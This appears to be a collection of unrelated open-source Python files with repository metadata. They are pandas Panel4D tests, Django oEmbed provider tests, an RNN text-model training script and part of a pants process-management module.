# key = datetime(2009,2,28)
# P[key] = data#
# assert_almost_equal(P[key].values, data)
def test_major_xs(self):
ref = self.panel4d['l1']['ItemA']
idx = self.panel4d.major_axis[5]
xs = self.panel4d.major_xs(idx)
assert_series_equal(xs['l1'].T['ItemA'], ref.xs(idx), check_names=False)
# not contained
idx = self.panel4d.major_axis[0] - bday
self.assertRaises(Exception, self.panel4d.major_xs, idx)
def test_major_xs_mixed(self):
self.panel4d['l4'] = 'foo'
xs = self.panel4d.major_xs(self.panel4d.major_axis[0])
self.assertEqual(xs['l1']['A'].dtype, np.float64)
self.assertEqual(xs['l4']['A'].dtype, np.object_)
def test_minor_xs(self):
ref = self.panel4d['l1']['ItemA']
idx = self.panel4d.minor_axis[1]
xs = self.panel4d.minor_xs(idx)
assert_series_equal(xs['l1'].T['ItemA'], ref[idx], check_names=False)
# not contained
self.assertRaises(Exception, self.panel4d.minor_xs, 'E')
def test_minor_xs_mixed(self):
self.panel4d['l4'] = 'foo'
xs = self.panel4d.minor_xs('D')
self.assertEqual(xs['l1'].T['ItemA'].dtype, np.float64)
self.assertEqual(xs['l4'].T['ItemA'].dtype, np.object_)
def test_xs(self):
l1 = self.panel4d.xs('l1', axis=0)
expected = self.panel4d['l1']
assert_panel_equal(l1, expected)
# view if possible
l1_view = self.panel4d.xs('l1', axis=0)
l1_view.values[:] = np.nan
self.assertTrue(np.isnan(self.panel4d['l1'].values).all())
# mixed-type
self.panel4d['strings'] = 'foo'
result = self.panel4d.xs('D', axis=3)
self.assertIsNotNone(result.is_copy)
def test_getitem_fancy_labels(self):
panel4d = self.panel4d
labels = panel4d.labels[[1, 0]]
items = panel4d.items[[1, 0]]
dates = panel4d.major_axis[::2]
cols = ['D', 'C', 'F']
# all 4 specified
assert_panel4d_equal(panel4d.ix[labels, items, dates, cols],
panel4d.reindex(labels=labels, items=items, major=dates, minor=cols))
# 3 specified
assert_panel4d_equal(panel4d.ix[:, items, dates, cols],
panel4d.reindex(items=items, major=dates, minor=cols))
# 2 specified
assert_panel4d_equal(panel4d.ix[:, :, dates, cols],
panel4d.reindex(major=dates, minor=cols))
assert_panel4d_equal(panel4d.ix[:, items, :, cols],
panel4d.reindex(items=items, minor=cols))
assert_panel4d_equal(panel4d.ix[:, items, dates, :],
panel4d.reindex(items=items, major=dates))
# only 1
assert_panel4d_equal(panel4d.ix[:, items, :, :],
panel4d.reindex(items=items))
assert_panel4d_equal(panel4d.ix[:, :, dates, :],
panel4d.reindex(major=dates))
assert_panel4d_equal(panel4d.ix[:, :, :, cols],
panel4d.reindex(minor=cols))
def test_getitem_fancy_slice(self):
pass
def test_getitem_fancy_ints(self):
pass
def test_getitem_fancy_xs(self):
raise nose.SkipTest("skipping for now")
# self.assertRaises(NotImplementedError, self.panel4d.major_xs)
# self.assertRaises(NotImplementedError, self.panel4d.minor_xs)
def test_get_value(self):
for label in self.panel4d.labels:
for item in self.panel4d.items:
for mjr in self.panel4d.major_axis[::2]:
for mnr in self.panel4d.minor_axis:
result = self.panel4d.get_value(
label, item, mjr, mnr)
expected = self.panel4d[label][item][mnr][mjr]
assert_almost_equal(result, expected)
def test_set_value(self):
for label in self.panel4d.labels:
for item in self.panel4d.items:
for mjr in self.panel4d.major_axis[::2]:
for mnr in self.panel4d.minor_axis:
self.panel4d.set_value(label, item, mjr, mnr, 1.)
assert_almost_equal(
self.panel4d[label][item][mnr][mjr], 1.)
# resize
res = self.panel4d.set_value('l4', 'ItemE', 'foo', 'bar', 1.5)
tm.assertIsInstance(res, Panel4D)
self.assertIsNot(res, self.panel4d)
self.assertEqual(res.get_value('l4', 'ItemE', 'foo', 'bar'), 1.5)
res3 = self.panel4d.set_value('l4', 'ItemE', 'foobar', 'baz', 5)
self.assertTrue(com.is_float_dtype(res3['l4'].values))
class TestPanel4d(tm.TestCase, CheckIndexing, SafeForSparse,
SafeForLongAndSparse):
_multiprocess_can_split_ = True
@classmethod
def assert_panel4d_equal(cls, x, y):
assert_panel4d_equal(x, y)
def setUp(self):
self.panel4d = tm.makePanel4D(nper=8)
add_nans(self.panel4d)
def test_constructor(self):
# with BlockManager
panel4d = Panel4D(self.panel4d._data)
self.assertIs(panel4d._data, self.panel4d._data)
panel4d = Panel4D(self.panel4d._data, copy=True)
self.assertIsNot(panel4d._data, self.panel4d._data)
assert_panel4d_equal(panel4d, self.panel4d)
# strings handled prop
# panel4d = Panel4D([[['foo', 'foo', 'foo',],
# ['foo', 'foo', 'foo']]])
# self.assertEqual(wp.values.dtype, np.object_)
vals = self.panel4d.values
# no copy
panel4d = Panel4D(vals)
self.assertIs(panel4d.values, vals)
# copy
panel4d = Panel4D(vals, copy=True)
self.assertIsNot(panel4d.values, vals)
# GH #8285, test when scalar data is used to construct a Panel4D
# if dtype is not passed, it should be inferred
value_and_dtype = [(1, 'int64'), (3.14, 'float64'), ('foo', np.object_)]
for (val, dtype) in value_and_dtype:
panel4d = Panel4D(val, labels=range(2), items=range(3), major_axis=range(4), minor_axis=range(5))
vals = np.empty((2, 3, 4, 5), dtype=dtype)
vals.fill(val)
assert_panel4d_equal(panel4d, Panel4D(vals, dtype=dtype))
# test the case when dtype is passed
panel4d = Panel4D(1, labels=range(2), items=range(3), major_axis=range(4), minor_axis=range(5), dtype='float32')
vals = np.empty((2, 3, 4, 5), dtype='float32')
vals.fill(1)
assert_panel4d_equal(panel4d, Panel4D(vals, dtype='float32'))
def test_constructor_cast(self):
zero_filled = self.panel4d.fillna(0)
casted = Panel4D(zero_filled._data, dtype=int)
casted2 = Panel4D(zero_filled.values, dtype=int)
exp_values = zero_filled.values.astype(int)
assert_almost_equal(casted.values, exp_values)
assert_almost_equal(casted2.values, exp_values)
casted = Panel4D(zero_filled._data, dtype=np.int32)
casted2 = Panel4D(zero_filled.values, dtype=np.int32)
exp_values = zero_filled.values.astype(np.int32)
assert_almost_equal(casted.values, exp_values)
assert_almost_equal(casted2.values, exp_values)
# can't cast
data = [[['foo', 'bar', 'baz']]]
self.assertRaises(ValueError, Panel, data, dtype=float)
def test_constructor_empty_panel(self):
empty = Panel()
self.assertEqual(len(empty.items), 0)
self.assertEqual(len(empty.major_axis), 0)
self.assertEqual(len(empty.minor_axis), 0)
def test_constructor_observe_dtype(self):
# GH #411
panel = Panel(items=lrange(3), major_axis=lrange(3),
minor_axis=lrange(3), dtype='O')
self.assertEqual(panel.values.dtype, np.object_)
def test_consolidate(self):
self.assertTrue(self.panel4d._data.is_consolidated())
self.panel4d['foo'] = 1.
self.assertFalse(self.panel4d._data.is_consolidated())
panel4d = self.panel4d.consolidate()
self.assertTrue(panel4d._data.is_consolidated())
def test_ctor_dict(self):
l1 = self.panel4d['l1']
l2 = self.panel4d['l2']
d = {'A': l1, 'B': l2.ix[['ItemB'], :, :]}
# d2 = {'A' : itema._series, 'B' : itemb[5:]._series}
# d3 = {'A' : DataFrame(itema._series),
# 'B' : DataFrame(itemb[5:]._series)}
panel4d = Panel4D(d)
# wp2 = Panel.from_dict(d2) # nested Dict
# wp3 = Panel.from_dict(d3)
# self.assertTrue(wp.major_axis.equals(self.panel.major_axis))
assert_panel_equal(panel4d['A'], self.panel4d['l1'])
assert_frame_equal(panel4d.ix['B', 'ItemB', :, :],
self.panel4d.ix['l2', ['ItemB'], :, :]['ItemB'])
# intersect
# wp = Panel.from_dict(d, intersect=True)
# self.assertTrue(wp.major_axis.equals(itemb.index[5:]))
# use constructor
# assert_panel_equal(Panel(d), Panel.from_dict(d))
# assert_panel_equal(Panel(d2), Panel.from_dict(d2))
# assert_panel_equal(Panel(d3), Panel.from_dict(d3))
# cast
# dcasted = dict((k, v.reindex(wp.major_axis).fillna(0))
# for k, v in d.iteritems())
# result = Panel(dcasted, dtype=int)
# expected = Panel(dict((k, v.astype(int))
# for k, v in dcasted.iteritems()))
# assert_panel_equal(result, expected)
def test_constructor_dict_mixed(self):
data = dict((k, v.values) for k, v in compat.iteritems(self.panel4d))
result = Panel4D(data)
exp_major = Index(np.arange(len(self.panel4d.major_axis)))
self.assertTrue(result.major_axis.equals(exp_major))
result = Panel4D(data,
labels=self.panel4d.labels,
items=self.panel4d.items,
major_axis=self.panel4d.major_axis,
minor_axis=self.panel4d.minor_axis)
assert_panel4d_equal(result, self.panel4d)
data['l2'] = self.panel4d['l2']
result = Panel4D(data)
assert_panel4d_equal(result, self.panel4d)
# corner, blow up
data['l2'] = data['l2']['ItemB']
self.assertRaises(Exception, Panel4D, data)
data['l2'] = self.panel4d['l2'].values[:, :, :-1]
self.assertRaises(Exception, Panel4D, data)
def test_constructor_resize(self):
data = self.panel4d._data
labels = self.panel4d.labels[:-1]
items = self.panel4d.items[:-1]
major = self.panel4d.major_axis[:-1]
minor = self.panel4d.minor_axis[:-1]
result = Panel4D(data, labels=labels, items=items,
major_axis=major, minor_axis=minor)
expected = self.panel4d.reindex(
labels=labels, items=items, major=major, minor=minor)
assert_panel4d_equal(result, expected)
result = Panel4D(data, items=items, major_axis=major)
expected = self.panel4d.reindex(items=items, major=major)
assert_panel4d_equal(result, expected)
result = Panel4D(data, items=items)
expected = self.panel4d.reindex(items=items)
assert_panel4d_equal(result, expected)
result = Panel4D(data, minor_axis=minor)
expected = self.panel4d.reindex(minor=minor)
assert_panel4d_equal(result, expected)
def test_from_dict_mixed_orient(self):
raise nose.SkipTest("skipping for now")
# df = tm.makeDataFrame()
# df['foo'] = 'bar'
# data = {'k1' : df,
# 'k2' : df}
# panel = Panel.from_dict(data, orient='minor')
# self.assertEqual(panel['foo'].values.dtype, np.object_)
# self.assertEqual(panel['A'].values.dtype, np.float64)
def test_values(self):
self.assertRaises(Exception, Panel, np.random.randn(5, 5, 5),
lrange(5), lrange(5), lrange(4))
def test_conform(self):
p = self.panel4d['l1'].filter(items=['ItemA', 'ItemB'])
conformed = self.panel4d.conform(p)
assert(conformed.items.equals(self.panel4d.labels))
assert(conformed.major_axis.equals(self.panel4d.major_axis))
assert(conformed.minor_axis.equals(self.panel4d.minor_axis))
def test_reindex(self):
ref = self.panel4d['l2']
# labels
result = self.panel4d.reindex(labels=['l1', 'l2'])
assert_panel_equal(result['l2'], ref)
# items
result = self.panel4d.reindex(items=['ItemA', 'ItemB'])
assert_frame_equal(result['l2']['ItemB'], ref['ItemB'])
# major
new_major = list(self.panel4d.major_axis[:10])
result = self.panel4d.reindex(major=new_major)
assert_frame_equal(
result['l2']['ItemB'], ref['ItemB'].reindex(index=new_major))
# raise exception put both major and major_axis
self.assertRaises(Exception, self.panel4d.reindex,
major_axis=new_major, major=new_major)
# minor
new_minor = list(self.panel4d.minor_axis[:2])
result = self.panel4d.reindex(minor=new_minor)
assert_frame_equal(
result['l2']['ItemB'], ref['ItemB'].reindex(columns=new_minor))
result = self.panel4d.reindex(labels=self.panel4d.labels,
items=self.panel4d.items,
major=self.panel4d.major_axis,
minor=self.panel4d.minor_axis)
# don't necessarily copy
result = self.panel4d.reindex()
assert_panel4d_equal(result,self.panel4d)
self.assertFalse(result is self.panel4d)
# with filling
smaller_major = self.panel4d.major_axis[::5]
smaller = self.panel4d.reindex(major=smaller_major)
larger = smaller.reindex(major=self.panel4d.major_axis,
method='pad')
assert_panel_equal(larger.ix[:, :, self.panel4d.major_axis[1], :],
smaller.ix[:, :, smaller_major[0], :])
# don't necessarily copy
result = self.panel4d.reindex(
major=self.panel4d.major_axis, copy=False)
assert_panel4d_equal(result,self.panel4d)
self.assertTrue(result is self.panel4d)
def test_not_hashable(self):
p4D_empty = Panel4D()
self.assertRaises(TypeError, hash, p4D_empty)
self.assertRaises(TypeError, hash, self.panel4d)
def test_reindex_like(self):
# reindex_like
smaller = self.panel4d.reindex(labels=self.panel4d.labels[:-1],
items=self.panel4d.items[:-1],
major=self.panel4d.major_axis[:-1],
minor=self.panel4d.minor_axis[:-1])
smaller_like = self.panel4d.reindex_like(smaller)
assert_panel4d_equal(smaller, smaller_like)
def test_take(self):
raise nose.SkipTest("skipping for now")
# # axis == 0
# result = self.panel.take([2, 0, 1], axis=0)
# expected = self.panel.reindex(items=['ItemC', 'ItemA', 'ItemB'])
# assert_panel_equal(result, expected)#
# # axis >= 1
# result = self.panel.take([3, 0, 1, 2], axis=2)
# expected = self.panel.reindex(minor=['D', 'A', 'B', 'C'])
# assert_panel_equal(result, expected)
# self.assertRaises(Exception, self.panel.take, [3, -1, 1, 2], axis=2)
# self.assertRaises(Exception, self.panel.take, [4, 0, 1, 2], axis=2)
def test_sort_index(self):
import random
rlabels = list(self.panel4d.labels)
ritems = list(self.panel4d.items)
rmajor = list(self.panel4d.major_axis)
rminor = list(self.panel4d.minor_axis)
random.shuffle(rlabels)
random.shuffle(ritems)
random.shuffle(rmajor)
random.shuffle(rminor)
random_order = self.panel4d.reindex(labels=rlabels)
sorted_panel4d = random_order.sort_index(axis=0)
assert_panel4d_equal(sorted_panel4d, self.panel4d)
# descending
# random_order = self.panel.reindex(items=ritems)
# sorted_panel = random_order.sort_index(axis=0, ascending=False)
# assert_panel_equal(sorted_panel,
# self.panel.reindex(items=self.panel.items[::-1]))
# random_order = self.panel.reindex(major=rmajor)
# sorted_panel = random_order.sort_index(axis=1)
# assert_panel_equal(sorted_panel, self.panel)
# random_order = self.panel.reindex(minor=rminor)
# sorted_panel = random_order.sort_index(axis=2)
# assert_panel_equal(sorted_panel, self.panel)
def test_fillna(self):
self.assertFalse(np.isfinite(self.panel4d.values).all())
filled = self.panel4d.fillna(0)
self.assertTrue(np.isfinite(filled.values).all())
self.assertRaises(NotImplementedError, self.panel4d.fillna, method='pad')
def test_swapaxes(self):
result = self.panel4d.swapaxes('labels', 'items')
self.assertIs(result.items, self.panel4d.labels)
result = self.panel4d.swapaxes('labels', 'minor')
self.assertIs(result.labels, self.panel4d.minor_axis)
result = self.panel4d.swapaxes('items', 'minor')
self.assertIs(result.items, self.panel4d.minor_axis)
result = self.panel4d.swapaxes('items', 'major')
self.assertIs(result.items, self.panel4d.major_axis)
result = self.panel4d.swapaxes('major', 'minor')
self.assertIs(result.major_axis, self.panel4d.minor_axis)
# this should also work
result = self.panel4d.swapaxes(0, 1)
self.assertIs(result.labels, self.panel4d.items)
# this works, but return a copy
result = self.panel4d.swapaxes('items', 'items')
assert_panel4d_equal(self.panel4d,result)
self.assertNotEqual(id(self.panel4d), id(result))
def test_to_frame(self):
raise nose.SkipTest("skipping for now")
# # filtered
# filtered = self.panel.to_frame()
# expected = self.panel.to_frame().dropna(how='any')
# assert_frame_equal(filtered, expected)
# # unfiltered
# unfiltered = self.panel.to_frame(filter_observations=False)
# assert_panel_equal(unfiltered.to_panel(), self.panel)
# # names
# self.assertEqual(unfiltered.index.names, ('major', 'minor'))
def test_to_frame_mixed(self):
raise nose.SkipTest("skipping for now")
# panel = self.panel.fillna(0)
# panel['str'] = 'foo'
# panel['bool'] = panel['ItemA'] > 0
# lp = panel.to_frame()
# wp = lp.to_panel()
# self.assertEqual(wp['bool'].values.dtype, np.bool_)
# assert_frame_equal(wp['bool'], panel['bool'])
def test_update(self):
p4d = Panel4D([[[[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.]],
[[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.]]]])
other = Panel4D([[[[3.6, 2., np.nan]],
[[np.nan, np.nan, 7]]]])
p4d.update(other)
expected = Panel4D([[[[3.6, 2, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.]],
[[1.5, np.nan, 7],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.]]]])
assert_panel4d_equal(p4d, expected)
def test_filter(self):
raise nose.SkipTest("skipping for now")
def test_apply(self):
raise nose.SkipTest("skipping for now")
def test_dtypes(self):
result = self.panel4d.dtypes
expected = Series(np.dtype('float64'),index=self.panel4d.labels)
assert_series_equal(result, expected)
def test_compound(self):
raise nose.SkipTest("skipping for now")
# compounded = self.panel.compound()
# assert_series_equal(compounded['ItemA'],
# (1 + self.panel['ItemA']).product(0) - 1)
def test_shift(self):
raise nose.SkipTest("skipping for now")
# # major
# idx = self.panel.major_axis[0]
# idx_lag = self.panel.major_axis[1]
# shifted = self.panel.shift(1)
# assert_frame_equal(self.panel.major_xs(idx),
# shifted.major_xs(idx_lag))
# # minor
# idx = self.panel.minor_axis[0]
# idx_lag = self.panel.minor_axis[1]
# shifted = self.panel.shift(1, axis='minor')
# assert_frame_equal(self.panel.minor_xs(idx),
# shifted.minor_xs(idx_lag))
# self.assertRaises(Exception, self.panel.shift, 1, axis='items')
def test_multiindex_get(self):
raise nose.SkipTest("skipping for now")
# ind = MultiIndex.from_tuples([('a', 1), ('a', 2), ('b', 1), ('b',2)],
# names=['first', 'second'])
# wp = Panel(np.random.random((4,5,5)),
# items=ind,
# major_axis=np.arange(5),
# minor_axis=np.arange(5))
# f1 = wp['a']
# f2 = wp.ix['a']
# assert_panel_equal(f1, f2)
# self.assertTrue((f1.items == [1, 2]).all())
# self.assertTrue((f2.items == [1, 2]).all())
# ind = MultiIndex.from_tuples([('a', 1), ('a', 2), ('b', 1)],
# names=['first', 'second'])
def test_multiindex_blocks(self):
raise nose.SkipTest("skipping for now")
# ind = MultiIndex.from_tuples([('a', 1), ('a', 2), ('b', 1)],
# names=['first', 'second'])
# wp = Panel(self.panel._data)
# wp.items = ind
# f1 = wp['a']
# self.assertTrue((f1.items == [1, 2]).all())
# f1 = wp[('b',1)]
# self.assertTrue((f1.columns == ['A', 'B', 'C', 'D']).all())
def test_repr_empty(self):
empty = Panel4D()
repr(empty)
def test_rename(self):
mapper = {
'l1': 'foo',
'l2': 'bar',
'l3': 'baz'
}
renamed = self.panel4d.rename_axis(mapper, axis=0)
exp = Index(['foo', 'bar', 'baz'])
self.assertTrue(renamed.labels.equals(exp))
renamed = self.panel4d.rename_axis(str.lower, axis=3)
exp = Index(['a', 'b', 'c', 'd'])
self.assertTrue(renamed.minor_axis.equals(exp))
# don't copy
renamed_nocopy = self.panel4d.rename_axis(mapper, axis=0, copy=False)
renamed_nocopy['foo'] = 3.
self.assertTrue((self.panel4d['l1'].values == 3).all())
def test_get_attr(self):
assert_panel_equal(self.panel4d['l1'], self.panel4d.l1)
def test_from_frame_level1_unsorted(self):
raise nose.SkipTest("skipping for now")
def test_to_excel(self):
raise nose.SkipTest("skipping for now")
if __name__ == '__main__':
import nose
nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb', '--pdb-failure'],
exit=False)
| {
"content_hash": "ba1a386a95be471943e4f07a534df68f",
"timestamp": "",
"source": "github",
"line_count": 1103,
"max_line_length": 120,
"avg_line_length": 35.034451495920216,
"alnum_prop": 0.5613177030768832,
"repo_name": "stevenzhang18/Indeed-Flask",
"id": "3772d4b9c272bebaf7593a7b0503624d407e60bf",
"size": "38667",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "lib/pandas/tests/test_panel4d.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "45061"
},
{
"name": "HTML",
"bytes": "1386611"
},
{
"name": "JavaScript",
"bytes": "84693"
},
{
"name": "Python",
"bytes": "10498302"
}
],
"symlink_target": ""
} |
import oembed
import simplejson
from oembed.exceptions import AlreadyRegistered, NotRegistered, OEmbedMissingEndpoint
from oembed.models import StoredProvider, StoredOEmbed
from oembed.resources import OEmbedResource
from oembed.tests.oembed_providers import BlogProvider
from oembed.tests.tests.base import BaseOEmbedTestCase
class ProviderSiteTestCase(BaseOEmbedTestCase):
def test_register(self):
oembed.site.unregister(BlogProvider)
self.assertRaises(NotRegistered, oembed.site.unregister, BlogProvider)
oembed.site.register(BlogProvider)
self.assertRaises(AlreadyRegistered, oembed.site.register, BlogProvider)
def test_get_provider(self):
oembed.site.unregister(BlogProvider)
self.assertRaises(OEmbedMissingEndpoint, oembed.site.provider_for_url, self.blog_url)
oembed.site.register(BlogProvider)
provider = oembed.site.provider_for_url(self.blog_url)
self.assertTrue(isinstance(provider, BlogProvider))
def test_embed(self):
oembed.site.unregister(BlogProvider)
self.assertRaises(OEmbedMissingEndpoint, oembed.site.embed, self.blog_url)
oembed.site.register(BlogProvider)
resource = oembed.site.embed(self.blog_url)
self.assertTrue(isinstance(resource, OEmbedResource))
def test_object_caching(self):
StoredOEmbed.objects.all().delete()
for i in range(3):
resource = oembed.site.embed(self.blog_url)
self.assertEqual(StoredOEmbed.objects.count(), 1)
for i in range(3):
resource = oembed.site.embed(self.blog_url, maxwidth=400, maxheight=400)
self.assertEqual(StoredOEmbed.objects.count(), 2)
for i in range(3):
resource = oembed.site.embed(self.blog_url, maxwidth=400)
self.assertEqual(StoredOEmbed.objects.count(), 3)
def test_autodiscovery(self):
resp = self.client.get('/oembed/')
json = simplejson.loads(resp.content)
providers = oembed.site.store_providers(json)
self.assertEqual(len(providers), 3)
blog_provider, category_provider, rich_provider = providers
self.assertEqual(blog_provider.wildcard_regex, 'http://example.com/testapp/blog/*/*/*/*/')
self.assertEqual(blog_provider.regex, 'http://example.com/testapp/blog/.+?/.+?/.+?/.+?/')
self.assertEqual(blog_provider.resource_type, 'link')
self.assertEqual(blog_provider.endpoint_url, 'http://example.com/oembed/json/')
self.assertEqual(category_provider.wildcard_regex, 'http://example.com/testapp/category/*/')
self.assertEqual(category_provider.regex, 'http://example.com/testapp/category/.+?/')
self.assertEqual(category_provider.resource_type, 'photo')
self.assertEqual(category_provider.endpoint_url, 'http://example.com/oembed/json/')
self.assertEqual(rich_provider.wildcard_regex, 'http://example.com/testapp/rich/*/')
self.assertEqual(rich_provider.regex, 'http://example.com/testapp/rich/.+?/')
self.assertEqual(rich_provider.resource_type, 'rich')
self.assertEqual(rich_provider.endpoint_url, 'http://example.com/oembed/json/')
| {
"content_hash": "b5ddcc37677e627f460c7fcce4975ff2",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 100,
"avg_line_length": 45.31506849315068,
"alnum_prop": 0.6774486094316807,
"repo_name": "ericholscher/djangoembed",
"id": "8529acb2c91852ba5c83e70d769929db6b22d039",
"size": "3308",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oembed/tests/tests/sites.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "49353"
},
{
"name": "Python",
"bytes": "129032"
}
],
"symlink_target": ""
} |
import csv
import itertools
import operator
import numpy as np
import nltk
import sys
import os
import time
from datetime import datetime
from utils import *
from rnn import RNNTheano
_VOCABULARY_SIZE = int(os.environ.get('VOCABULARY_SIZE', '8000'))
_HIDDEN_DIM = int(os.environ.get('HIDDEN_DIM', '80'))
_LEARNING_RATE = float(os.environ.get('LEARNING_RATE', '0.005'))
_NEPOCH = int(os.environ.get('NEPOCH', '100'))
_MODEL_FILE = os.environ.get('MODEL_FILE')
def train_with_sgd(model, X_train, y_train, learning_rate=0.005, nepoch=1, evaluate_loss_after=5):
# We keep track of the losses so we can plot them later
losses = []
num_examples_seen = 0
for epoch in range(nepoch):
# Optionally evaluate the loss
if (epoch % evaluate_loss_after == 0):
loss = model.calculate_loss(X_train, y_train)
losses.append((num_examples_seen, loss))
time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
print "%s: Loss after num_examples_seen=%d epoch=%d: %f" % (time, num_examples_seen, epoch, loss)
# Adjust the learning rate if loss increases
if (len(losses) > 1 and losses[-1][1] > losses[-2][1]):
learning_rate = learning_rate * 0.5
print "Setting learning rate to %f" % learning_rate
sys.stdout.flush()
# ADDED! Saving model oarameters
save_model_parameters_theano("./data/rnn-theano-%d-%d-%s.npz" % (model.hidden_dim, model.word_dim, time), model)
# For each training example...
for i in range(len(y_train)):
# One SGD step
model.sgd_step(X_train[i], y_train[i], learning_rate)
num_examples_seen += 1
vocabulary_size = _VOCABULARY_SIZE
unknown_token = "UNKNOWN_TOKEN"
sentence_start_token = "SENTENCE_START"
sentence_end_token = "SENTENCE_END"
# Read the data and append SENTENCE_START and SENTENCE_END tokens
print "Reading CSV file..."
with open('data/reddit-comments-2015-08.csv', 'rb') as f:
reader = csv.reader(f, skipinitialspace=True)
reader.next()
# Split full comments into sentences
sentences = itertools.chain(*[nltk.sent_tokenize(x[0].decode('utf-8').lower()) for x in reader])
# Append SENTENCE_START and SENTENCE_END
sentences = ["%s %s %s" % (sentence_start_token, x, sentence_end_token) for x in sentences]
print "Parsed %d sentences." % (len(sentences))
# Tokenize the sentences into words
tokenized_sentences = [nltk.word_tokenize(sent) for sent in sentences]
# Count the word frequencies
word_freq = nltk.FreqDist(itertools.chain(*tokenized_sentences))
print "Found %d unique words tokens." % len(word_freq.items())
# Get the most common words and build index_to_word and word_to_index vectors
vocab = word_freq.most_common(vocabulary_size-1)
index_to_word = [x[0] for x in vocab]
index_to_word.append(unknown_token)
word_to_index = dict([(w,i) for i,w in enumerate(index_to_word)])
print "Using vocabulary size %d." % vocabulary_size
print "The least frequent word in our vocabulary is '%s' and appeared %d times." % (vocab[-1][0], vocab[-1][1])
# Replace all words not in our vocabulary with the unknown token
for i, sent in enumerate(tokenized_sentences):
tokenized_sentences[i] = [w if w in word_to_index else unknown_token for w in sent]
# Create the training data
X_train = np.asarray([[word_to_index[w] for w in sent[:-1]] for sent in tokenized_sentences])
y_train = np.asarray([[word_to_index[w] for w in sent[1:]] for sent in tokenized_sentences])
model = RNNTheano(vocabulary_size, hidden_dim=_HIDDEN_DIM)
t1 = time.time()
model.sgd_step(X_train[10], y_train[10], _LEARNING_RATE)
t2 = time.time()
print "SGD Step time: %f milliseconds" % ((t2 - t1) * 1000.)
if _MODEL_FILE != None:
load_model_parameters_theano(_MODEL_FILE, model)
train_with_sgd(model, X_train, y_train, nepoch=_NEPOCH, learning_rate=_LEARNING_RATE) | {
"content_hash": "d99110386d9b3d56360932b3e489c492",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 124,
"avg_line_length": 42.043010752688176,
"alnum_prop": 0.6741687979539642,
"repo_name": "khuongnn/NERRNN",
"id": "9f794a922debe9b908caf8b95ad06e26678b82a5",
"size": "3934",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "train (khuongnn-desktop's conflicted copy 2017-01-11).py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "56515"
},
{
"name": "Python",
"bytes": "29194"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import signal
import time
import traceback
from contextlib import contextmanager
import psutil
from pants.base.build_environment import get_buildroot
from pants.init.subprocess import Subprocess
from pants.util.dirutil import read_file, rm_rf, safe_file_dump, safe_mkdir
from pants.util.process_handler import subprocess
logger = logging.getLogger(__name__)
@contextmanager
def swallow_psutil_exceptions():
"""A contextmanager that swallows standard psutil access exceptions."""
try:
yield
except (psutil.AccessDenied, psutil.NoSuchProcess):
# This masks common, but usually benign psutil process access exceptions that might be seen
# when accessing attributes/methods on psutil.Process objects.
pass
class ProcessGroup(object):
"""Wraps a logical group of processes and provides convenient access to ProcessManager objects."""
def __init__(self, name, metadata_base_dir=None):
self._name = name
self._metadata_base_dir = metadata_base_dir
def _instance_from_process(self, process):
"""Default converter from psutil.Process to process instance classes for subclassing."""
return ProcessManager(name=process.name(),
pid=process.pid,
process_name=process.name(),
metadata_base_dir=self._metadata_base_dir)
def iter_processes(self, proc_filter=None):
"""Yields processes from psutil.process_iter with an optional filter and swallows psutil errors.
If a psutil exception is raised during execution of the filter, that process will not be
yielded but subsequent processes will. On the other hand, if psutil.process_iter raises
an exception, no more processes will be yielded.
"""
with swallow_psutil_exceptions(): # process_iter may raise
for proc in psutil.process_iter():
with swallow_psutil_exceptions(): # proc_filter may raise
if (proc_filter is None) or proc_filter(proc):
yield proc
def iter_instances(self, *args, **kwargs):
for item in self.iter_processes(*args, **kwargs):
yield self._instance_from_process(item)
class ProcessMetadataManager(object):
""""Manages contextual, on-disk process metadata."""
class MetadataError(Exception): pass
class Timeout(Exception): pass
FILE_WAIT_SEC = 10
WAIT_INTERVAL_SEC = .1
def __init__(self, metadata_base_dir=None):
"""
:param str metadata_base_dir: The base directory for process metadata.
"""
super(ProcessMetadataManager, self).__init__()
self._metadata_base_dir = (
metadata_base_dir or
Subprocess.Factory.global_instance().create().get_subprocess_dir()
)
@staticmethod
def _maybe_cast(item, caster):
"""Given a casting function, attempt to cast to that type while masking common cast exceptions.
N.B. This is mostly suitable for casting string types to numeric types - e.g. a port number
read from disk into an int.
:param func caster: A casting callable (e.g. `int`).
:returns: The result of caster(item) or item if TypeError or ValueError are raised during cast.
"""
try:
return caster(item)
except (TypeError, ValueError):
# N.B. the TypeError catch here (already) protects against the case that caster is None.
return item
@classmethod
def _deadline_until(cls, closure, timeout, wait_interval=WAIT_INTERVAL_SEC):
"""Execute a function/closure repeatedly until a True condition or timeout is met.
:param func closure: the function/closure to execute (should not block for long periods of time
and must return True on success).
:param float timeout: the maximum amount of time to wait for a true result from the closure in
seconds. N.B. this is timing based, so won't be exact if the runtime of
the closure exceeds the timeout.
:param float wait_interval: the amount of time to sleep between closure invocations.
:raises: :class:`ProcessManager.Timeout` on execution timeout.
"""
deadline = time.time() + timeout
while 1:
if closure():
return True
elif time.time() > deadline:
raise cls.Timeout('exceeded timeout of {} seconds for {}'.format(timeout, closure))
elif wait_interval:
time.sleep(wait_interval)
@classmethod
def _wait_for_file(cls, filename, timeout=FILE_WAIT_SEC, want_content=True):
"""Wait up to timeout seconds for filename to appear with a non-zero size or raise Timeout()."""
def file_waiter():
return os.path.exists(filename) and (not want_content or os.path.getsize(filename))
try:
return cls._deadline_until(file_waiter, timeout)
